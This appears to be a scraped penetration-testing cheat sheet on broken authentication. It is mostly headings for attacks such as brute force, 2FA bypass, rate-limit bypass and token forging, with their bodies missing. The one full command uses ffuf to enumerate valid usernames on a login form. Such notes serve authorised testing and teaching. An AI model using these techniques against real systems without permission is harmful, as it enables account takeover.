Broken Authentication
User Enumeration
Identify
Exploit - ffuf User Enumeration (Login Form)
ffuf -w /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt \
-u http://TARGET/index.php \
-X POST \
-H "Content-Type: application/x-www-form-urlencoded" \
-d "username=FUZZ&password=invalid" \
-fr "Unknown user"Exploit - ffuf User Enumeration (Password Reset)
Cookie as hash of username
Password Brute Force
Filter Wordlist by Password Policy
Exploit - ffuf Password Brute Force
Password Reset Token Brute Force
Identify
Generate Token Wordlist
Exploit - ffuf Reset Token Brute Force
2FA Bypass
Identify
Exploit - ffuf 2FA Brute Force
Rate Limit Bypass
Identify
Exploit - Randomize X-Forwarded-For
Security Question Brute Force
Identify
Create City Wordlist
Exploit - ffuf Security Question Brute Force
Password Reset Manipulation
Identify
Exploit - Change Username in Final Request
Authentication Bypass - Direct Access
Identify
Exploit - Burp Response Modification
Exploit - curl
Authentication Bypass - Parameter Modification
Identify
Exploit
Session Token Attacks
Identify Weak Tokens
Decode Session Tokens
Forge Admin Token
Session Fixation
Identify
Exploit
Default Credentials
Resources
Common Defaults
App
Username
Password
Search
Cookie/Session Reuse Across Subdomains
Identify
Scenario
Exploit
Why This Works
Tool-Assisted
Last updated